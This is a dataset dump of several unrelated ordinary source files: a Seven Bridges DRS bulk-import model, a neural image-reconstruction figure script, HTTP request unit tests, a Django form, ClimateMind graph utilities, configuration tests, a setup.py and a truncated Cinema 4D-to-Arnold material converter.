:return: DRSImportBulk object.
"""
if not imports:
raise SbgError('Imports are required')
api = api or cls._API
items = []
for import_ in imports:
project = import_.get('project')
parent = import_.get('parent')
if project and parent:
raise SbgError(
'Project and parent identifiers are mutually exclusive'
)
elif project:
import_['project'] = Transform.to_project(project)
elif parent:
import_['parent'] = Transform.to_file(parent)
else:
raise SbgError('Project or parent identifier is required.')
items.append(import_)
data = {
'conflict_resolution': conflict_resolution,
'tags': tags,
'items': items
}
response = api.post(url=cls._URL['create'], data=data).json()
return DRSImportBulk(api=api, **response)
| import logging
from sevenbridges.errors import SbgError
from sevenbridges.meta.fields import (
HrefField, StringField, DateTimeField, CompoundListField
)
from sevenbridges.meta.resource import Resource
from sevenbridges.meta.transformer import Transform
from sevenbridges.models.compound.import_result import FileImportResult
from sevenbridges.models.file import File
logger = logging.getLogger(__name__)
class DRSImportBulk(Resource):
"""
Central resource for managing DRS imports.
"""
_URL = {
'get': '/bulk/drs/imports/{id}',
'create': '/bulk/drs/imports/create',
}
id = StringField(read_only=True)
href = HrefField(read_only=True)
result = CompoundListField(FileImportResult, read_only=True)
_result_files = [] # cache for result_files property
state = StringField(read_only=True)
started_on = DateTimeField(read_only=True)
finished_on = DateTimeField(read_only=True)
def __str__(self):
return f'<DRSBulkImport: id={self.id}>'
def __eq__(self, other):
if type(other) is not type(self):
return False
return self is other or self.id == other.id
@property
def result_files(self):
"""
Retrieve files that were successfully imported.
:return: List of File objects
"""
try:
cached_file_ids = set([
file.resource.id for file in self._result_files
])
imported_file_ids = set([
file.resource.id
for file in self.result if file.resource
])
file_ids_to_retrieve = imported_file_ids - cached_file_ids
if file_ids_to_retrieve:
files = File.bulk_get(
files=file_ids_to_retrieve, api=self._api
)
self._result_files.extend(files)
return self._result_files if self._result_files else None
except TypeError:
return None
@classmethod
def bulk_get(cls, import_job_id, api=None):
"""
Retrieve DRS bulk import details
:param import_job_id: Import id to be retrieved.
:param api: Api instance.
:return: DRSImportBulk object.
"""
api = api or cls._API
if not import_job_id:
raise SbgError('DRS import is required!')
elif not isinstance(import_job_id, str):
raise SbgError('Invalid DRS import parameter!')
response = api.get(
url=cls._URL['get'].format(id=import_job_id)
).json()
return DRSImportBulk(api=api, **response)
@classmethod
def bulk_submit(
cls, imports, tags=None, conflict_resolution='SKIP', api=None
):
"""
Submit DRS bulk import
:param imports: List of dicts describing a wanted import.
:param tags: list of tags to be applied.
:param conflict_resolution: Type of file naming conflict resolution.
:param api: Api instance.
:return: DRSImportBulk object.
"""
if not imports:
raise SbgError('Imports are required')
api = api or cls._API
items = []
for import_ in imports:
project = import_.get('project')
parent = import_.get('parent')
if project and parent:
raise SbgError(
'Project and parent identifiers are mutually exclusive'
)
elif project:
import_['project'] = Transform.to_project(project)
elif parent:
import_['parent'] = Transform.to_file(parent)
else:
raise SbgError('Project or parent identifier is required.')
items.append(import_)
data = {
'conflict_resolution': conflict_resolution,
'tags': tags,
'items': items
}
response = api.post(url=cls._URL['create'], data=data).json()
return DRSImportBulk(api=api, **response) | en | 0.74062 | Central resource for managing DRS imports. # cache for result_files property Retrieve files that were successfully imported. :return: List of File objects Retrieve DRS bulk import details :param import_job_id: Import id to be retrieved. :param api: Api instance. :return: DRSImportBulk object. Submit DRS bulk import :param imports: List of dicts describing a wanted import. :param tags: list of tags to be applied. :param conflict_resolution: Type of file naming conflict resolution. :param api: Api instance. :return: DRSImportBulk object. | 1.95006 | 2 |
figure_2.py | gortizji/inr_dictionaries | 11 | 6612419 | <reponame>gortizji/inr_dictionaries
import os
import imageio
import jax
import matplotlib.pyplot as plt
import numpy as np
from skimage.transform import resize
import warnings
from models.models_flax import FFN
from train.standard import fit_image
from utils.graphics import plot_fourier_tranform
from utils.img_processing import crop_from_right, image_to_dataset
def plot_reconstructions(
outputs,
image_GT,
save_phrase="",
):
outdir = os.path.join(os.getcwd(), "figures", "figure_2")
if not os.path.exists(outdir):
os.makedirs(outdir)
# Show final network outputs
plt.figure(figsize=(12, 4))
rec = outputs["pred_imgs"][-1]
plt.imshow(rec)
plt.axis("off")
plt.savefig(outdir + "/rec_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plt.imshow(image_GT)
plt.axis("off")
plt.savefig(outdir + "/gt_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(rec)
plt.savefig(outdir + "/rec_ft_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(image_GT)
plt.savefig(outdir + "/gt_ft_" + save_phrase + ".pdf", bbox_inches="tight")
def train_and_plot_image(
model,
train_data,
test_data,
image_GT,
optimizer_type="adam",
batch_size=None,
start_iter=0,
initial_params=None,
optimizer=None,
opt_state=None,
last_layer_rand_init=False,
log_every=25,
iters=2000,
learning_rate=1e-4,
rand_state=0,
save_phrase="",
):
outputs, _ = fit_image(
model,
train_data,
test_data,
optimizer_type,
batch_size,
start_iter,
initial_params,
optimizer,
opt_state,
last_layer_rand_init,
log_every,
iters,
learning_rate,
rand_state,
)
plot_reconstructions(outputs, image_GT, save_phrase)
return outputs
if __name__ == "__main__":
warnings.filterwarnings("default", category=FutureWarning)
warnings.filterwarnings("default", category=ImportWarning)
# save GT image and create test/train data
image_url = "https://i.imgur.com/OQnG76L.jpeg"
img = imageio.imread(image_url)
img = img / 255
img = crop_from_right(img, 960)
img = resize(img, (512, 512), anti_aliasing=True)
# create a dataset out of that image
_, img_data = image_to_dataset(img)
print("Reconstructing with FFN (sigma=10)")
outputs = train_and_plot_image(
FFN(
features=np.array([256, 256, 256, 3]),
B=10 * jax.random.normal(jax.random.PRNGKey(7), (256, 2)),
),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="rff_256",
)
print("Reconstructing with single frequency mapping (f0=1)")
# single frequency mapping bbf-1
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_1",
)
print("Reconstructing with single frequency mapping (f0=05)")
# single frequency mapping bff-05
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=0.5 * np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_05",
)
| import os
import imageio
import jax
import matplotlib.pyplot as plt
import numpy as np
from skimage.transform import resize
import warnings
from models.models_flax import FFN
from train.standard import fit_image
from utils.graphics import plot_fourier_tranform
from utils.img_processing import crop_from_right, image_to_dataset
def plot_reconstructions(
outputs,
image_GT,
save_phrase="",
):
outdir = os.path.join(os.getcwd(), "figures", "figure_2")
if not os.path.exists(outdir):
os.makedirs(outdir)
# Show final network outputs
plt.figure(figsize=(12, 4))
rec = outputs["pred_imgs"][-1]
plt.imshow(rec)
plt.axis("off")
plt.savefig(outdir + "/rec_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plt.imshow(image_GT)
plt.axis("off")
plt.savefig(outdir + "/gt_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(rec)
plt.savefig(outdir + "/rec_ft_" + save_phrase + ".pdf", bbox_inches="tight")
plt.figure()
plot_fourier_tranform(image_GT)
plt.savefig(outdir + "/gt_ft_" + save_phrase + ".pdf", bbox_inches="tight")
def train_and_plot_image(
model,
train_data,
test_data,
image_GT,
optimizer_type="adam",
batch_size=None,
start_iter=0,
initial_params=None,
optimizer=None,
opt_state=None,
last_layer_rand_init=False,
log_every=25,
iters=2000,
learning_rate=1e-4,
rand_state=0,
save_phrase="",
):
outputs, _ = fit_image(
model,
train_data,
test_data,
optimizer_type,
batch_size,
start_iter,
initial_params,
optimizer,
opt_state,
last_layer_rand_init,
log_every,
iters,
learning_rate,
rand_state,
)
plot_reconstructions(outputs, image_GT, save_phrase)
return outputs
if __name__ == "__main__":
warnings.filterwarnings("default", category=FutureWarning)
warnings.filterwarnings("default", category=ImportWarning)
# save GT image and create test/train data
image_url = "https://i.imgur.com/OQnG76L.jpeg"
img = imageio.imread(image_url)
img = img / 255
img = crop_from_right(img, 960)
img = resize(img, (512, 512), anti_aliasing=True)
# create a dataset out of that image
_, img_data = image_to_dataset(img)
print("Reconstructing with FFN (sigma=10)")
outputs = train_and_plot_image(
FFN(
features=np.array([256, 256, 256, 3]),
B=10 * jax.random.normal(jax.random.PRNGKey(7), (256, 2)),
),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="rff_256",
)
print("Reconstructing with single frequency mapping (f0=1)")
# single frequency mapping bbf-1
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_1",
)
print("Reconstructing with single frequency mapping (f0=05)")
# single frequency mapping bff-05
outputs = train_and_plot_image(
FFN(features=np.array([256, 256, 256, 3]), B=0.5 * np.eye(2)),
train_data=img_data,
test_data=img_data,
image_GT=img,
iters=2000,
save_phrase="bff_05",
) | en | 0.743623 | # Show final network outputs # save GT image and create test/train data # create a dataset out of that image # single frequency mapping bbf-1 # single frequency mapping bff-05 | 2.066052 | 2 |
tests/test_request.py | copper/python-pointdns | 1 | 6612420 | <reponame>copper/python-pointdns
from pointdns.helpers import request
import unittest2
from httmock import urlmatch, HTTMock
class RequestTests(unittest2.TestCase):
def test_https_post_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='post', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('post', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_get_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='get', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('get', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_https_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
| from pointdns.helpers import request
import unittest2
from httmock import urlmatch, HTTMock
class RequestTests(unittest2.TestCase):
def test_https_post_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='post', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('post', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_get_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='get', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('get', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_http_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='http',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='http')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK')
def test_https_put_request(self):
@urlmatch(netloc=r'pointhq\.com', scheme='https',
method='put', path='/')
def response_content(url, request):
return {'status_code': 200,
'content': b'OK'}
with HTTMock(response_content):
r = request('put', '/', ('john', 'secret-key'), scheme='https')
self.assertTrue(r.status == 200)
self.assertTrue(r.content == 'OK') | none | 1 | 2.610367 | 3 | |
mysite/calls/forms.py | gurupratap-matharu/django-calls-registration-app | 0 | 6612421 | from django import forms
from .models import Call
class RegisterForm(forms.ModelForm):
class Meta:
model = Call
fields = ['duration', 'type']
| from django import forms
from .models import Call
class RegisterForm(forms.ModelForm):
class Meta:
model = Call
fields = ['duration', 'type']
| none | 1 | 1.851829 | 2 | |
ontology_processing/graph_creation/ontology_processing_utils.py | ClimateMind/climatemind-ontology-processing | 0 | 6612422 | <gh_stars>0
import networkx as nx
from networkx.readwrite import json_graph
import os
from collections import OrderedDict
def custom_bfs(graph, start_node, direction="forward", edge_type="causes_or_promotes"):
"""
Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node
Parameters
----------
graph - nx.DiGraph to explore
start_node - root of the BFS search
direction - forward, reverse, or any. Controls what direction BFS searches in
edge_type - only explore along edges of this type (can be "any")
Returns
-------
subgraph with nodes explored
"""
# Using a list because we want to have the explored elements returned later.
queue = [start_node]
cur_index = 0
def do_bfs(element):
nonlocal cur_index
if direction == "reverse" or direction == "any":
for start, end, type in graph.in_edges(element, "type"):
if start not in queue and (edge_type == "any" or type == edge_type):
queue.append(start)
if direction == "forward" or direction == "any":
for start, end, type in graph.out_edges(element, "type"):
if end not in queue and (edge_type == "any" or type == edge_type):
queue.append(end)
do_bfs(start_node)
while cur_index < len(queue):
do_bfs(queue[cur_index])
cur_index = cur_index + 1
return graph.subgraph(queue)
def union_subgraph(subgraphs, *, base_graph):
"""
Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included
(whereas nx.union doesn't include edges connecting subgraphs together).
Parameters
----------
subgraphs - a list of subgraphs to union
base_graph - forced keyword argument of the graph that these subgraphs are based upon
Returns
-------
a new subgraph of base_graph containing all nodes in subgraphs list
"""
G_node_set = set()
for other_subg in subgraphs:
G_node_set = G_node_set.union(set(other_subg.nodes()))
return base_graph.subgraph(G_node_set)
def listify(collection, onto):
"""just capturing a repeated operation"""
return [str(thing.label[0]) for thing in collection if thing in onto.classes()]
def get_source_types():
return [
"dc_source",
"schema_academicBook",
"schema_academicSourceNoPaywall",
"schema_academicSourceWithPaywall",
"schema_governmentSource",
"schema_mediaSource",
"schema_mediaSourceForConservatives",
"schema_organizationSource",
]
def solution_sources(node):
"""Returns a flattened list of custom solution source values from each node key that matches
custom_source_types string.
node - NetworkX node
source_types - list of sources types
"""
source_types = get_source_types()
# loop over each solution source key and append each returned value to the solution_sources list
solution_source_list = list()
for source_type in source_types:
if "properties" in node and source_type in node["properties"]:
solution_source_list.extend(node["properties"][source_type])
solution_source_list = list(OrderedDict.fromkeys(solution_source_list))
return solution_source_list
def get_valid_test_ont():
return {
"test ontology",
"personal value",
"achievement",
"benevolence",
"benevolence caring",
"benevolence dependability",
"conformity",
"conformity interpersonal",
"conformity rules",
"face",
"hedonism",
"humility",
"power",
"power dominance",
"power resources",
"security",
"security personal",
"security societal",
"self-direction",
"self-direction autonomy of action",
"self-direction autonomy of thought",
"stimulation",
"tradition",
"universalism",
"universalism concern",
"universalism nature",
"universalism tolerance",
}
def get_non_test_ont():
return {
"value uncategorized (to do)",
"risk solution",
"adaptation",
"geoengineering",
"indirect adaptation",
"indirect geoengineering",
"indirect mitigration",
"carbon pricing",
"carbon tax",
"emissions trading",
"mitigation",
"solution to indirect adaptation barrier",
"solution to indirect mitigation barrier",
"solution uncategorized (to do)",
}
def remove_non_test_nodes(T, node, valid_test_ont, not_test_ont):
if node in T.nodes:
is_test_ont = False
for c in T.nodes[node]["direct classes"]:
if c in valid_test_ont:
is_test_ont = True
if c in not_test_ont:
is_test_ont = False
break
if not is_test_ont:
T.remove_node(node)
else:
is_test_ont = False
def get_test_ontology(T, valid_test_ont, not_test_ont):
for edge in list(T.edges):
node_a = edge[0]
node_b = edge[1]
remove_non_test_nodes(T, node_a, valid_test_ont, not_test_ont)
remove_non_test_nodes(T, node_b, valid_test_ont, not_test_ont)
def give_alias(property_object):
label_name = property_object.label[0]
label_name = label_name.replace("/", "_or_")
label_name = label_name.replace(" ", "_")
label_name = label_name.replace(":", "_")
property_object.python_name = label_name
return label_name
def _save_graph_helper(G, outfile_path, fname="Climate_Mind_DiGraph", ext=".gpickle"):
writer = {
".gpickle": nx.write_gpickle,
".gexf": nx.write_gexf,
".gml": nx.write_gml,
".graphml": nx.write_graphml,
#".yaml": nx.write_yaml,
".json": lambda g, f: f.write(json_graph.jit_data(g, indent=4)),
}
mode = "wb"
if ext in (".json", ".yaml"):
mode = "w"
file_path = os.path.join(outfile_path, fname + ext)
with open(file_path, mode) as outfile:
writer[ext](G, outfile)
def save_graph_to_pickle(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gpickle")
def save_graph_to_gexf(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gexf")
def save_graph_to_gml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gml")
def save_graph_to_graphml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".graphml")
#def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"):
# _save_graph_helper(G, outfile_path, fname, ext=".yaml")
def save_graph_to_json(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".json")
def save_test_ontology_to_json(G, outfile_path, fname="Climate_Mind_Digraph_Test_Ont"):
save_graph_to_json(G, outfile_path, fname)
| import networkx as nx
from networkx.readwrite import json_graph
import os
from collections import OrderedDict
def custom_bfs(graph, start_node, direction="forward", edge_type="causes_or_promotes"):
"""
Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node
Parameters
----------
graph - nx.DiGraph to explore
start_node - root of the BFS search
direction - forward, reverse, or any. Controls what direction BFS searches in
edge_type - only explore along edges of this type (can be "any")
Returns
-------
subgraph with nodes explored
"""
# Using a list because we want to have the explored elements returned later.
queue = [start_node]
cur_index = 0
def do_bfs(element):
nonlocal cur_index
if direction == "reverse" or direction == "any":
for start, end, type in graph.in_edges(element, "type"):
if start not in queue and (edge_type == "any" or type == edge_type):
queue.append(start)
if direction == "forward" or direction == "any":
for start, end, type in graph.out_edges(element, "type"):
if end not in queue and (edge_type == "any" or type == edge_type):
queue.append(end)
do_bfs(start_node)
while cur_index < len(queue):
do_bfs(queue[cur_index])
cur_index = cur_index + 1
return graph.subgraph(queue)
def union_subgraph(subgraphs, *, base_graph):
"""
Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included
(whereas nx.union doesn't include edges connecting subgraphs together).
Parameters
----------
subgraphs - a list of subgraphs to union
base_graph - forced keyword argument of the graph that these subgraphs are based upon
Returns
-------
a new subgraph of base_graph containing all nodes in subgraphs list
"""
G_node_set = set()
for other_subg in subgraphs:
G_node_set = G_node_set.union(set(other_subg.nodes()))
return base_graph.subgraph(G_node_set)
def listify(collection, onto):
"""just capturing a repeated operation"""
return [str(thing.label[0]) for thing in collection if thing in onto.classes()]
def get_source_types():
return [
"dc_source",
"schema_academicBook",
"schema_academicSourceNoPaywall",
"schema_academicSourceWithPaywall",
"schema_governmentSource",
"schema_mediaSource",
"schema_mediaSourceForConservatives",
"schema_organizationSource",
]
def solution_sources(node):
"""Returns a flattened list of custom solution source values from each node key that matches
custom_source_types string.
node - NetworkX node
source_types - list of sources types
"""
source_types = get_source_types()
# loop over each solution source key and append each returned value to the solution_sources list
solution_source_list = list()
for source_type in source_types:
if "properties" in node and source_type in node["properties"]:
solution_source_list.extend(node["properties"][source_type])
solution_source_list = list(OrderedDict.fromkeys(solution_source_list))
return solution_source_list
def get_valid_test_ont():
return {
"test ontology",
"personal value",
"achievement",
"benevolence",
"benevolence caring",
"benevolence dependability",
"conformity",
"conformity interpersonal",
"conformity rules",
"face",
"hedonism",
"humility",
"power",
"power dominance",
"power resources",
"security",
"security personal",
"security societal",
"self-direction",
"self-direction autonomy of action",
"self-direction autonomy of thought",
"stimulation",
"tradition",
"universalism",
"universalism concern",
"universalism nature",
"universalism tolerance",
}
def get_non_test_ont():
return {
"value uncategorized (to do)",
"risk solution",
"adaptation",
"geoengineering",
"indirect adaptation",
"indirect geoengineering",
"indirect mitigration",
"carbon pricing",
"carbon tax",
"emissions trading",
"mitigation",
"solution to indirect adaptation barrier",
"solution to indirect mitigation barrier",
"solution uncategorized (to do)",
}
def remove_non_test_nodes(T, node, valid_test_ont, not_test_ont):
if node in T.nodes:
is_test_ont = False
for c in T.nodes[node]["direct classes"]:
if c in valid_test_ont:
is_test_ont = True
if c in not_test_ont:
is_test_ont = False
break
if not is_test_ont:
T.remove_node(node)
else:
is_test_ont = False
def get_test_ontology(T, valid_test_ont, not_test_ont):
for edge in list(T.edges):
node_a = edge[0]
node_b = edge[1]
remove_non_test_nodes(T, node_a, valid_test_ont, not_test_ont)
remove_non_test_nodes(T, node_b, valid_test_ont, not_test_ont)
def give_alias(property_object):
label_name = property_object.label[0]
label_name = label_name.replace("/", "_or_")
label_name = label_name.replace(" ", "_")
label_name = label_name.replace(":", "_")
property_object.python_name = label_name
return label_name
def _save_graph_helper(G, outfile_path, fname="Climate_Mind_DiGraph", ext=".gpickle"):
writer = {
".gpickle": nx.write_gpickle,
".gexf": nx.write_gexf,
".gml": nx.write_gml,
".graphml": nx.write_graphml,
#".yaml": nx.write_yaml,
".json": lambda g, f: f.write(json_graph.jit_data(g, indent=4)),
}
mode = "wb"
if ext in (".json", ".yaml"):
mode = "w"
file_path = os.path.join(outfile_path, fname + ext)
with open(file_path, mode) as outfile:
writer[ext](G, outfile)
def save_graph_to_pickle(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gpickle")
def save_graph_to_gexf(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gexf")
def save_graph_to_gml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".gml")
def save_graph_to_graphml(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".graphml")
#def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"):
# _save_graph_helper(G, outfile_path, fname, ext=".yaml")
def save_graph_to_json(G, outfile_path, fname="Climate_Mind_DiGraph"):
_save_graph_helper(G, outfile_path, fname, ext=".json")
def save_test_ontology_to_json(G, outfile_path, fname="Climate_Mind_Digraph_Test_Ont"):
save_graph_to_json(G, outfile_path, fname) | en | 0.835718 | Explores graph and gets the subgraph containing all the nodes that are reached via BFS from start_node Parameters ---------- graph - nx.DiGraph to explore start_node - root of the BFS search direction - forward, reverse, or any. Controls what direction BFS searches in edge_type - only explore along edges of this type (can be "any") Returns ------- subgraph with nodes explored # Using a list because we want to have the explored elements returned later. Joins multiple subgraphs of the same base graph together. Edges connecting subgraphs are also included (whereas nx.union doesn't include edges connecting subgraphs together). Parameters ---------- subgraphs - a list of subgraphs to union base_graph - forced keyword argument of the graph that these subgraphs are based upon Returns ------- a new subgraph of base_graph containing all nodes in subgraphs list just capturing a repeated operation Returns a flattened list of custom solution source values from each node key that matches custom_source_types string. node - NetworkX node source_types - list of sources types # loop over each solution source key and append each returned value to the solution_sources list #".yaml": nx.write_yaml, #def save_graph_to_yaml(G, outfile_path, fname="Climate_Mind_DiGraph"): # _save_graph_helper(G, outfile_path, fname, ext=".yaml") | 3.25276 | 3 |
tests/utils/configuration_test.py | kokosing/git-gifi | 9 | 6612423 | from tests.utils.git_test import AbstractGitReposTest
import mock
from gifi.command import CommandException
from gifi.utils.configuration import Configuration, configuration_command
class ConfigurationTest(AbstractGitReposTest):
def test_happy_path(self):
config = self._create_test_config()
assert config.sample == 'sample_default_value'
assert config['sample'] == 'sample_default_value'
assert config.list() == ['sample']
assert config.description('sample') == 'Sample description'
config.set('sample', 'new value')
assert config.sample == 'new value'
newConfig = self._create_test_config()
assert newConfig.sample == 'new value'
def _create_test_config(self):
config = Configuration(self.local_repo, 'test', {
'sample': ('sample_default_value', 'Sample description')
})
return config
def test_configure(self):
config = self._bool_config()
with mock.patch('__builtin__.input', return_value='true'):
config.configure()
assert config.bool_property == True
def test_configure_with_wrong_input(self):
config = self._bool_config()
with mock.patch('__builtin__.input', return_value='wrong value'):
expected_msg = ".*Wrong value.*"
with self.assertRaisesRegexp(CommandException, expected_msg):
config.configure()
assert config.bool_property == False
def _bool_config(self):
config = Configuration(self.local_repo, 'test', {
'bool-property': (False, 'Description')
})
return config
def test_configure_with_no_input(self):
config = self._create_test_config()
with mock.patch('__builtin__.input', return_value=''):
config.configure()
assert config.sample == 'sample_default_value'
def test_command(self):
with mock.patch('__builtin__.input', return_value=''):
configuration_command(self._create_test_config, "description")()
| from tests.utils.git_test import AbstractGitReposTest
import mock
from gifi.command import CommandException
from gifi.utils.configuration import Configuration, configuration_command
class ConfigurationTest(AbstractGitReposTest):
def test_happy_path(self):
config = self._create_test_config()
assert config.sample == 'sample_default_value'
assert config['sample'] == 'sample_default_value'
assert config.list() == ['sample']
assert config.description('sample') == 'Sample description'
config.set('sample', 'new value')
assert config.sample == 'new value'
newConfig = self._create_test_config()
assert newConfig.sample == 'new value'
def _create_test_config(self):
config = Configuration(self.local_repo, 'test', {
'sample': ('sample_default_value', 'Sample description')
})
return config
def test_configure(self):
config = self._bool_config()
with mock.patch('__builtin__.input', return_value='true'):
config.configure()
assert config.bool_property == True
def test_configure_with_wrong_input(self):
config = self._bool_config()
with mock.patch('__builtin__.input', return_value='wrong value'):
expected_msg = ".*Wrong value.*"
with self.assertRaisesRegexp(CommandException, expected_msg):
config.configure()
assert config.bool_property == False
def _bool_config(self):
config = Configuration(self.local_repo, 'test', {
'bool-property': (False, 'Description')
})
return config
def test_configure_with_no_input(self):
config = self._create_test_config()
with mock.patch('__builtin__.input', return_value=''):
config.configure()
assert config.sample == 'sample_default_value'
def test_command(self):
with mock.patch('__builtin__.input', return_value=''):
configuration_command(self._create_test_config, "description")()
| none | 1 | 2.676061 | 3 | |
setup.py | gasymovdf/sla | 0 | 6612424 | <reponame>gasymovdf/sla
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='sla',
version='1.3.3',
author="<NAME>",
author_email="<EMAIL>",
description="Non-parametric LOSVD analysis for galaxy spectra",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gasymovdf/sla",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["pseudoslit==0.0.2",
"numpy==1.21.4",
"scipy==1.7.3",
"matplotlib==3.5.1",
"astropy==5.0",
"lmfit==1.0.3",
"vorbin==3.1.4",
"pseudoslit==0.0.2",
"glob2==0.7",
"PyPDF2==1.26.0",
"tqdm==4.62.3"]
) | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='sla',
version='1.3.3',
author="<NAME>",
author_email="<EMAIL>",
description="Non-parametric LOSVD analysis for galaxy spectra",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gasymovdf/sla",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["pseudoslit==0.0.2",
"numpy==1.21.4",
"scipy==1.7.3",
"matplotlib==3.5.1",
"astropy==5.0",
"lmfit==1.0.3",
"vorbin==3.1.4",
"pseudoslit==0.0.2",
"glob2==0.7",
"PyPDF2==1.26.0",
"tqdm==4.62.3"]
) | none | 1 | 1.340731 | 1 | |
exemple/basicc4dconverted.py | gr4ph0s/C4DToA_python_wrapper | 5 | 6612425 | """
08-26-2017
Basic exemple of the arnold python wrapper.
It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader.
"""
import c4d
import os
from arnold_wrapper.Arnold import Arnold
def get_reflectance(mat):
"""Get the texture inside the first slot the c4d reflectance channel"""
filename = None
base = c4d.REFLECTION_LAYER_LAYER_DATA + c4d.REFLECTION_LAYER_LAYER_SIZE * 4
try:
filename = mat[base + c4d.REFLECTION_LAYER_COLOR_TEXTURE]
except:
pass
return filename
def get_normal(mat):
"""Get the texture inside the normal channel of a c4d mat"""
filename = None
try:
filename = mat[c4d.MATERIAL_NORMAL_SHADER]
except:
pass
return filename
def get_diffuse(mat):
"""Get the texture inside the diffuse channel of a c4d mat"""
filename = None
try:
filename = mat[c4d.MATERIAL_COLOR_SHADER]
except:
pass
return filename
def get_alpha(mat):
"""Get the texture inside the alpha channel of a c4d mat"""
filename = None
inverted = False
try:
filename = mat[c4d.MATERIAL_ALPHA_SHADER]
inverted = mat[c4d.MATERIAL_ALPHA_INVERT]
except:
pass
return filename, inverted
def past_assignment(doc, source, dest):
"""Copy assignement beetween source math to dest mat"""
tag = None
ObjLink = source[c4d.ID_MATERIALASSIGNMENTS]
source_count = ObjLink.GetObjectCount()
for i in range(0, source_count):
tag = ObjLink.ObjectFromIndex(doc, i)
if tag:
doc.AddUndo(c4d.UNDOTYPE_CHANGE, tag)
tag[c4d.TEXTURETAG_MATERIAL] = dest
def get_filepath(sha):
"""Get the file path of a Xbitmap"""
if not sha:
return None
if not sha.CheckType(c4d.Xbitmap):
return None
full_path = sha[c4d.BITMAPSHADER_FILENAME]
if not full_path:
return None
return str(full_path)
def convert_c4d_to_arnold(doc, mat):
"""Main function that convert c4d mat to arnold mat"""
a = Arnold()
#Get material data
diffuse = get_diffuse(mat)
diffuse_path = get_filepath(diffuse)
reflectance = get_reflectance(mat)
reflectance_path = get_filepath(reflectance)
normal = get_normal(mat)
normal_path = get_filepath(normal)
alpha, alpha_invert = get_alpha(mat)
alpha_path = get_filepath(alpha)
